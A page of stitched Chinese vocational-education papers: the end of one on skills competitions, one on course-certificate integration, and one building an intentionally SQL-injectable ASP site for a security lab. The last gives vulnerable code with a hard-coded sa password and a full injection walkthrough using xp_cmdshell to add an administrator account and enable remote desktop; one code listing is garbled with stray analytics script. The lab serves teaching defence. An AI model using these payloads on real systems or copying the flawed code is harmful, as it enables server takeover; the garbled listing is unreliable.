要為課堂學習表現(如考勤、紀律、實訓完成情況等)、階段性考核、團隊合作能力等。階段性考核以通過實訓課中增設的障礙性實驗為主,考查學生解決問題的能力。對于障礙性實驗的設置,主要將技能競賽的內容與教學內容相結合,設置故障類、實驗系統延伸類、實驗方案調整類題目,考查學生對所學知識的掌握程度與解決實際問題的能力。期末考核以綜合性題目為主,以考查學生的理論知識與工程實際綜合運用水平。通過考核方式向技能和綜合素質部分的側重,可向學生傳達專業課程以實踐為主、理論為輔的教學思想,提升學生勤于思考、善于動手的實踐技能訓練意識。3.深化教師隊伍的實踐教學能力,調動教師教學的積極性要激勵教師主動承擔競賽指導的責任,就要健全機制,完善配套制度。教師產學研踐習成效與教師評價考核掛鉤,與學校職務評聘、福利待遇、年終獎金等掛鉤,與職務晉升、聘任等評價考核指標體系掛鉤,從而激發教師的積極性與創造性。通過指導學生參賽,能促進教師不斷學習,積極深入企業積累實戰經驗,讓自己的專業知識與生產發展同步,教出來的學生能與企業需求匹配。參加和指導技能比賽,教師不但可以了解和學習本專業前沿技術、發展趨勢、實踐技能的考核點,提升自己本專業的實踐水平,還能提高自己的收益,體現自身價值,真正實現“以賽促教”的雙師型教學。4.深化校企合作,完善實踐教學實訓基地的建設在學校的教學中難以實現的是實踐教學。要解決這一問題,就需要采用校企合作的方法。對于很多學校而言,所選企業是否適合教學實踐也同樣存在著不少問題。那么依托于職業技能大賽,學校與大賽設備供應商就能采取“實訓基地”“校企合作工作室”這樣的雙贏合作模式。大賽供應商大多是國內實力雄厚的高新技術企業,如與筆者學校合作的神州數碼、西安開元、新大陸教育等企業,它們不但能解決學校技術變革相對閉塞的問題,使學校增加了符合行業標準的實訓器材,對實訓基地的總體布局、設備配置、環境布置等方面嚴格把關,科學設計流程,努力實現與企業實際工作環境的“零距離”對接;它們還能提供師資培訓,及時為幫助計算機網絡專業教師提高自身的技術技能。
四、小結
筆者學校基于“計算機網絡搭建與應用”競賽項目,從實踐教學的硬件和軟件方面著手,已初步實現“以職業技能比賽為平臺,以增強學生的實踐動手能力和創新精神為基本導向,以提高學生綜合素質,增強就業競爭力為目標”的實踐教學方式。但探索中待解決的問題仍有許多,還需積極研究和探索,以期為同類中職校學生職業技能培養途徑和方法提供思維啟發和經驗借鑒,豐富中職校人才培養模式。
作者:歐秋菊 單位:廣西電子高級技工學校
參考文獻:
[1]翁敏峰.高職院校《計算機網絡基礎》課程教學研究[J].電腦知識與技術,2010(02Z).
關鍵詞:高職;網絡專業;課證融合;教學改革
中圖分類號:G712 文獻標識碼:A 文章編號:1672-5727(2013)10-0039-02
“課證融合”的內涵
“課”,即課程,廣義的課程是指學校為實現培養目標而選擇的教育內容及其進程的總和,包括學校所教的各門學科和有目的、有計劃的教育活動;狹義的課程是指某一門學科的具體教學內容。
“證”,即證書,是指國家的職業資格證書或社會的技能證書,它表明就業者掌握的實際操作能力和職業勝任能力。這一類證書的顯著特點是與職業崗位的具體要求結合密切,能更直接、更準確地反映特定職業的技能標準和操作規范。
“課證融合”是指以市場所需的職業資格證書為導向,以實現學生充分就業和有效就業為目標,將考證項目、職業崗位與課程體系相結合的一種人才培養模式,該模式要求課程設計與職業考證相對應,課程教材和教學內容與考證內容相一致,通過課程學習,學生可以直接參加相關職業資格證書的考試。
“課證融合”的背景
隨著市場競爭日益激烈,愈來愈多的用人單位由過去單純看重應聘人員的學歷層次轉而看重其實際技能水平,而應聘者是否擁有相應的職業資格證書無疑是評測其技能水平最快捷的方法。這一轉變對高職教育是契機,也是挑戰。
1996年頒布的《中華人民共和國職業教育法》第八條規定:“各職業院校都要實行學歷證書、培訓證書和職業資格證書制度”。2004年,教育部《關于以就業為導向深化高等職業教育改革的若干意見》提出:“大力推行‘雙證書’制度,促進人才培養模式改革,在高等職業院校大力推行職業資格證書制度”。2011年,教育部《關于充分發揮行業指導作用推進職業教育改革發展的意見》中提出:要推進建立和完善“雙證書”制度,實現學歷證書與職業資格證書對接。以上法規及政策為“雙證制度”的推行提供了相關的法律依據。
“課證融合”將職業資格標準要求引入常規的教學體系,為學生免去了社會認證培訓的高額費用,在減輕學生經濟負擔的同時可切實提高學生的就業競爭力。所以,一經推出便廣受好評。因此,在高職院校推行“課證融合”已逐漸成為實施“雙證”制度的主要方式。
“課證融合”的現狀
以網絡技術專業為例。許多高職院校都在推行該專業“課證融合”的教學改革,但在實施過程中卻呈現出諸多亂相,主要表現為:(1)認證繁多,魚龍混雜。計算機網絡技術方面的國家級證書包括全國計算機等級考試、計算機高新技術認證、計算機軟件專業技術資格等多種證書。企業認證更是種類繁雜,各種證書的水平良莠不齊,有的甚至質量低下。學生在應聘時展示此類證書,用人單位根本不予認可。(2)教材陳舊,多以理論為主。目前,許多高職網絡技術專業教材仍然以理論知識為主,屬壓縮型的本科教材,涉及的許多技術也早已被市場淘汰。雖然某些教材增加了實訓內容,但理論與實踐脫節,可操作性差。(3)師資滯后,教師實踐經驗匱乏。“課證融合”的教學團隊多以校內教師為主,因教學任務重、下企業難、掛職鍛煉的相關待遇無法落實等客觀原因,使得專業教師下企業鍛煉的機會和時間較少,無法勝任培養職業人才的重任。校方外聘的兼職教師雖是技術專家,但往往只是做一兩個講座或上一兩次課,流于表面,很難深入地對其教學質量予以監控。(4)實訓環節薄弱,資金支持不夠。網絡技術專業的實操性很強,但許多高職院校對實訓設施的投入明顯不足,在經濟欠發達地區這種情形尤為嚴重。教師只得采用免費的仿真軟件進行教學,但這些仿真軟件往往質量不高,漏洞頻出,難以為學生提供形象真實的工作環境體驗。
“課證融合”教學改革的實踐探索
我院網絡技術專業本著“以就業崗位為導向,以職業能力為本位,以資格認證為載體”的原則,自2008年起推行了針對計算機網絡組建及安全維護方向的“課證融合”教學改革。經過反復總結與實踐,筆者提出了“崗位逆推認證品牌,三元共促課證融合”的教改模式,其具體框架如圖1所示。
崗位逆推認證品牌 網絡技術的認證名目繁多,選擇何種證書是“課證融合”教學改革首先需處理的問題,也是決定“課證融合”成敗的首要問題。“崗位逆推法”具體如下:首先根據本專業對應的就職崗位(如網絡管理員),由勞動力市場圈定此類崗位對應的有公信力的認證品牌及合適的認證級別,如此逆推并遴選出來的認證可直指就業,學生及社會認可度較高。另外,在上述圈定出的相關證書中,還應考慮到認證費用的因素,如思科認證雖然在網絡行業內被普遍認可,但因其價格較高,成為該項認證在高職院校推廣“課證融合”的“瓶頸”。經反復權衡,我們選擇了H3C系列認證。一則H3C公司作為網絡設備的著名品牌,其產品在國內占據了可觀的市場份額,其廣泛的銷售及合作伙伴要求其從業人員具有相關資格證書。且H3C認證是通過國際認證機構向全球核發認證,運作嚴謹規范,具有較強的公信力。學生若能通過此認證,將可為其提供一個良好的就業平臺。二則按照H3C公司的相關規定,設立H3C網絡學院的院校,其學生可以以優惠的價格申請認證,此舉大受學生歡迎。三則H3C網絡學院體系完善,配套教材及師資培訓機制也較為健全,可為“課證融合”的進一步發展奠定堅實基礎。綜上所述,在確定職業資格認證時,應選擇行業普遍認同的、主流的認證,盡量選擇知名企業,利用企業的品牌效應,提高證書的含金量。另外要兼顧學生的實際接受水平,因地制宜,最終選擇出性價比較高的認證品牌。
三元素共促課證融合 從平面化的資格認證到過程化的課程建設,需要“雙師隊伍、雙證教材、實訓基地”三元素共同促進,方能搭建起“課程”與“證書”間的互連橋梁(如上頁圖1所示),最終實現“課”與“證”二者的無縫對接。
1.“雙師”隊伍。要落實“課證融合”,應首先培養一支“雙師”隊伍。此處的“雙師”有雙重涵義:(1)從教學管理角度看,應調整“雙師”結構比例。可大量聘請行業企業的技術專家到學校擔任兼職教師,加大兼職教師的比例,逐步形成實踐技能課程主要由具有高技能水平的兼職教師講授的機制。(2)從教師個人角度看,應注意鍛造教師個人的“雙師”素質。學校的大部分在職教師是具有扎實專業理論的學術型教師,但企業實踐經驗較少,需要鼓勵其到企業參加頂崗實踐,直接參與實際工程項目的實施和技術開發工作,豐富其工程經驗;而對于實踐能力強的兼職教師而言,則應建議其盡快熟練掌握各種教學方法和教學手段,洞悉教育心理及規律,提高教學藝術水平。需要指出的是,有些高職院校一味地增加兼職教師數量而忽視專職教師“雙師”素質建設的做法是不足取的。根據我國現有體制,兼職教師主要供職于所在企業,平時項目多,任務重,很難抽出大量的時間和精力投入學校的課程建設中。所以,“課證融合”教學團隊的主力軍仍是專職教師。專職教師提高自身“雙師”素質的具體途徑有:(1)校內取經。利用輔助所在學校兼職教師進行教學的機會,向兼職教師虛心求教,學習取經。(2)職業認證。通過考取行業高級從業資格認證,熟悉職業崗位能力要求及職業資格任職標準。(3)項目參與。利用寒暑假或在爭取到學校政策支持后,赴相關行業的公司進行為期半年以上的掛職鍛煉,或到校企合作單位參加實際項目,獲得第一手的項目案例資料,全面了解行業動態及工作流程。
2.雙證教材。“雙證”教材不同于社會認證教材,也不同于傳統的高職教材,應是能同時滿足高職學歷教育和職業資格認證雙重需求的教材。其特征應以職業性內容為主,以學術性內容為輔,以任務引領為出發點,強調職業能力的培養,還需要綜合考慮多方面的因素,如知識與應用結合、學時數、學生接受能力等。筆者結合我院網絡專業的實際情況,以H3C網絡學院教材為藍本,采用任務驅動模式自行編寫了對應的校本教材和講義,以典型項目案例為任務切入點,在完成工作任務的過程中介紹知識,將教學大綱、教學內容、教法、教案融為一體,成為“四位一體”的教材。這樣的教材簡明實用,可降低學生學習的難度,提高學生學習的興趣,貼近我校學生實際。當然,“雙證”教材的編撰工作還應實時跟蹤企業,吸取行業專家的建議,不斷改善校本教材,與時俱進,以適合行業發展需要。
3.實訓基地。實訓基地是“課證融合”實訓教學的重要保障,實訓基地建設的好壞直接影響到實踐教學的質量和效果。根據網絡技術類崗位要求,應建設“學做合一、工作與實訓合一、教學與服務合一”的校內生產性實訓基地和緊密型校外實習基地。校方應主動聯系知名企業,本著“工學結合、優勢互補、資源共享、互惠雙贏”的原則,爭取與之合建共享式實訓教學基地。在校內實訓基地運行過程中,要探索教師與工程人員的融通、教學實訓與項目過程的結合,使實訓基地產生自我造血功能,進而深化以工作過程導向的課程體系改革,促進“雙師”結構教學團隊建設。另外,校方應拓寬校外實訓基地的建設渠道,開發校外實訓基地的多功能和多用途,建立多類型實訓基地,實現校內外實訓基地的緊密銜接。比如,通過不定期召開由校企雙方主要負責人參加的校外頂崗實訓基地工作協調會,完善校外基地實訓過程管理的制度化建設,改變校外實訓“放羊式”的狀況。通過豐富的實訓實習環節,使學生在項目實踐中產生豐富的感性認知,促進對相關應用操作類認證考題的深入理解和熟練掌握。
實踐證明,上述“課證融合”模式的教學改革工作已初見成效,學生就業競爭力明顯增強,但高職網絡專業“課證融合”的教學改革仍屬初級階段,筆者提出的某些方式和方法仍需進一步深入論證和完善。
參考文獻:
[1]章安平.基于職業導向的“課證融合”人才培養模式研究與實踐[M].北京:高等教育出版社,2009.
[2]高林,許遠,張方.職業院校“雙證書”教學工作的研究——關于職業技術教育教學改革的思考[J].中國職業技術教育,2006(5).
[3]姜大源.職業教育學研究新論[M].北京:教育科學出版社,2008.
作者簡介:
李益(1974—),女,浙江嵊州人,碩士,北京政法職業學院講師,研究方向為計算機網絡系統集成、計算機網絡安全。
關鍵詞:高職院校;SQL注入攻擊;實驗環境;網絡安全
中圖分類號:G712 文獻標識碼:A 文章編號:1672-5727(2013)12-0168-03
研究意義
SQL注入攻擊是黑客攻擊最常用的手段之一,其危害極大。一些不具備很多網絡安全技術的“腳本小子”,使用一些傻瓜式SQL注入攻擊工具,就可能攻陷網站,進而控制服務器。
高職院校的《網絡安全與防范》課程,具有培養學生掌握較高網絡安全防范技能的任務。因此,必須使學生掌握好SQL注入攻擊的防范措施。而為了真正掌握SQL注入攻擊的防范措施,又必須透徹理解SQL注入攻擊的原理和具體實施步驟。經驗表明,這是一個教學難點,因為它需要精心構造SQL語句,來完成信息的查詢、語句的執行等。
我們開展了一項教學改革,旨在提高《網絡安全與防范》課程的教學效果。該教學改革中的一項內容,就是研究如何更好地開展SQL注入攻擊的教學。我們認為,如果能夠搭建一個簡單的具有SQL注入漏洞的動態網站,讓學生對這個網站進行模擬攻擊,對于學生更好地掌握SQL注入攻擊的原理和具體實施步驟具有很大好處,也能讓他們更好地掌握相應的安全防范措施。
SQL注入攻擊實驗環境的搭建
我們使用VMware WorkStation虛擬機軟件安裝了兩臺虛擬機,一臺虛擬機安裝的是Windows Server 2003操作系統,用于模擬被攻擊的服務器,IP地址為192.168.248.132;另一臺虛擬機安裝的是Windows XP操作系統,用于模擬黑客使用的攻擊機,IP地址為192.168.248.133。在Windows Server 2003虛擬機上,搭建了一個使用ASP+SQL Server 2000開發的簡單的動態網站。我們設計該動態網站的思路是:該網站具有SQL注入漏洞,能滿足SQL注入攻擊的實驗要求;該網站應該盡量簡單,以便于學生理解、分析和掌握。
按照以上設計思路,我們開發了一個簡單的名為testweb的動態網站。該動態網站需要訪問一個名為testweb的數據庫,該數據庫包含一個表:tblNews。tblNews用來保存新聞的標題和內容,初始時在這個表中輸入了一些測試用的數據。它的具體結構如表1所示。
該網站包括以下三個頁面:conn.asp、news.asp、displayNews.asp。其中conn.asp用于保存與SQL Server 2000數據庫服務器的連接信息;news.asp用于讀取數據庫中的新聞記錄,顯示所有新聞的標題,并且將這些標題以超鏈接的形式顯示。當單擊某個新聞的標題后,即可以進入形如displayNews.asp?id=xxx的頁面,看到新聞的具體內容(其中“xxx”表示某條新聞在tblNews表中ID字段的值)。設置該網站的默認頁面為news.asp。
conn.asp的代碼如下所示:
Const SqlDatabaseName = "testweb"
Const SqlPassword = "michaeljordan"
Const SqlUsername = "sa"
Const SqlLocalName = "(local)"
dim ConnStr
ConnStr = "Provider = Sqloledb;User ID = " & SqlUsername & ";Password = " & SqlPassword & ";Initial Catalog = " & SqlDatabaseName & ";Data Source = " & SqlLocalName & ";"
news.asp的代碼如下所示:
Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.open ConnStr
dim strSql
strSql="select * from tblNews"
dim rs
set rs=conn.Execute(strSql)
dim newsID
response.Write("")
response.Write("")
response.Write("")
while not rs.EOF
response.Write("")
response.Write("")
newsID=rs("ID")
response.Write(" " & rs("title")& " ")
response.Write("")
response.Write("")
rs.MoveNext
wend
response.Write("")
response.Write("var _gaq = _gaq || [];_gaq.push(['_setAccount', 'UA-22575914-1']);_gaq.push(['_setDomainName', '']);_gaq.push(['_trackPageview']);(function () {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'ssl' : 'www') + '/ga.js';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();var _userid = '';var _siteid =75;var _istoken = 1;var _model = 'Model03'; WebPageSpeed =2828; UrchinTrack();")
response.Write("")
rs.close()
conn.close
set rs=nothing
set conn=nothing
%>
displayNews.asp的代碼如下所示:
Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.open ConnStr
dim newsID
newsID=request("id")
dim strSql
strSql="select * from tblNews where ID=" & newsID
dim rs
set rs=conn.Execute(strSql)
response.Write(rs("content"))
rs.close()
conn.close
set rs=nothing
set conn=nothing
%
從以上三個頁面的具體代碼可以看出,我們所設計的動態網站具有簡單,易于理解、分析和掌握的優點。
同時頁面displayNews.asp有SQL注入漏洞,可以滿足SQL注入攻擊的實訓需要,其具有SQL注入漏洞的具體語句為:strSql="select * from tblNews where ID=" & newsID,該語句根據某條新聞的ID查詢tblNews表的內容。我們可以在形如displayNews.asp?id=xxx的地址后面加入精心構造的語句,從而執行特定的SQL語句,控制服務器。
SQL注入攻擊實驗環境的使用
如上所述,我們開發的動態網站testweb具有SQL注入漏洞,下面我們通過具體的入侵步驟來展示該SQL注入攻擊實驗環境的使用。(以下攻擊步驟參考了相關網絡安全書籍的內容。)
(一)判斷網站是否有SQL注入漏洞
可以通過在displayNews.asp?id=1后加上“’”、“ and 1=1”和“ and 1=2”等方法來判斷網站是否有SQL注入漏洞。如在地址欄輸入:http://192.168.248.132/testweb/displayNews.asp?id=1’ (1)
頁面返回如下錯誤信息:
Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14'
字符串 '' 之前有未閉合的引號。
/testweb/displayNews.asp,行 13
從以上提示信息可以看出,數據庫服務器為SQL Server。(1)的原理是:正常的SQL語句為select * from tblNews where ID=1,而(1)導致SQL語句成為:select * from tblNews where ID=1’,這樣會使得單引號沒有閉合而出錯。
在地址欄輸入:http://192.168.
248.132/testweb/displayNews.asp?id=1 and 1=1 (2)
返回正常頁面。而在地址欄輸入:http://192.168.248.132/testweb/displayNews.asp?id=1 and 1=2
(3)
返回的錯誤信息是:
ADODB.Field 錯誤 '80020009'
BOF 或 EOF 中有一個是“真”,或者當前的記錄已被刪除,所需的操作要求一個當前的記錄。
/testweb/displayNews.asp,行 0
(2)導致SQL語句成為:select * from tblNews where ID=1 and 1=1,因為1=1為永真式,所以不影響原來的查詢結果,返回正常頁面。而(3)導致SQL語句成為:select * from tblNews where ID=1 and 1=2,因為1=2為永假式,所以查詢結果為空,而程序中沒有對此進行處理,所以導致出現錯誤提示信息。
通過以上測試,可以明確地知道網站存在SQL注入漏洞,而且數據庫服務器為SQL Server。
(二)查找是否有xp_cmdshell擴展存儲過程
在地址欄輸入:http://192.168.
248.132/testweb/displayNews.asp?id=
1 and exists(select * from master.dbo.sysobjects where name=’xp_
cmdshell’)
頁面返回正常,從而知道master.dbo.sysobjects表中存在擴展過程xp_cmdshell。通過執行xp_cmdshell存儲過程可以實現添加用戶、將用戶添加到管理員組、開啟遠程終端連接等許多操作。
(三)通過xp_cmdshell添加系統管理員賬戶
在地址欄輸入:http://192.168.
248.132/testweb/displayNews.asp?id=
1;exec master..xp_cmdshell ‘net user test test/add’ (4)
頁面返回正常。執行該語句后,可以添加一個名為test,密碼也為test的賬戶。(4)的原理是:通過xp_cmdshell擴展存儲過程,執行net user命令,實現添加賬戶的操作。
在地址欄輸入:http://192.168.
248.132/testweb/displayNews.asp?id=1;exec master..xp_cmdshell ‘net localgroup administrators test /add’
頁面返回正常。執行該語句后,可以將賬戶test添加到系統管理員組。
(四)開啟目標計算機的遠程終端連接
在地址欄輸入:http://192.168.
248.132/testweb/displayNews.asp?id=
1;exec master..xp_cmdshell ‘reg add “HKLM\System\CurrentControl-
Set\Control\Terminal Server”/v fDeny
TSConnections/t REG_DWORD /d 0/f’ (5)
頁面返回正常。執行完后,可以開啟目標計算機的遠程終端連接。(5)的原理是:通過xp_cmdshell擴展存儲過程,執行reg add語句,完成修改注冊表,開啟遠程終端連接的操作。執行完以上步驟之后,即可以使用新建的test賬號遠程登錄目標計算機192.168.248.132。
討論
為了使學生掌握SQL注入攻擊的原理、具體實施步驟和相應的防范措施,必須搭建實驗環境讓他們演練SQL注入攻擊的實施步驟。為此,我們搭建了一個ASP+SQL Server 2000環境下的SQL Server注入攻擊實驗環境。我們沒有使用Dvbbs等現成的動態網站,因為這些動態網站功能較齊全,但代碼很復雜,不利于初學者理解、分析和掌握。我們設計的動態網站具有簡單,易于學生理解、分析和掌握的優點。我們演示了在該實驗環境中進行SQL注入攻擊,判斷是否存在SQL注入漏洞,判斷數據庫服務器是否支持xp_cmdshell擴展過程,使用xp_cmdshell添加系統管理員賬號、開啟遠程終端連接、使用攻擊機遠程登錄目標計算機等操作。這表明使用我們搭建的簡單的SQL注入攻擊實驗環境,可以方便地進行SQL注入攻擊演練。這對提高學生的學習興趣,掌握SQL注入攻擊的原理和具體的實施步驟,提高網絡安全防護意識等都具有很大的好處。
同時,利用該實驗環境,或者對該實驗環境稍微進行擴展,我們還可以進行更多的SQL注入攻擊演練,如猜解數據庫、表、字段的數目、字段的名稱、字段的內容等等。
我們的教學經驗表明,通過使用這個簡單的實驗環境,教學效果能得到明顯的提升。
參考文獻:
[1]肖遙.大中型網絡入侵要案直擊與防御[M].北京:電子工業出版社,2011.
[2]朱錫華,劉月鏵,侯偉.暗戰亮劍——黑客滲透與防御全程實錄[M].北京:人民郵電出版社,2010.
[3]武新華,陳艷艷,王英英.矛與盾:黑客攻防與腳本編程[M].北京:機械工業出版社,2010.
免责声明以上文章内容均来源于本站老师原创或网友上传,不代表本站观点,与本站立场无关,仅供学习和参考。本站不是任何杂志的官方网站,直投稿件和出版请联系出版社。
特别声明:本站持有《出版物经营许可证》,主要从事期刊杂志零售,不是任何杂志官网,不涉及出版事务,特此申明。
工信部备案:蜀ICP备09010985号-13 川公网安备:51092202000203 统一信用码:91510922MACX24HU41
© 版权所有:四川博文网络科技有限责任公司太和分公司
出版物经营许可证:射行审新出发2023字第016号 股权代码:102064
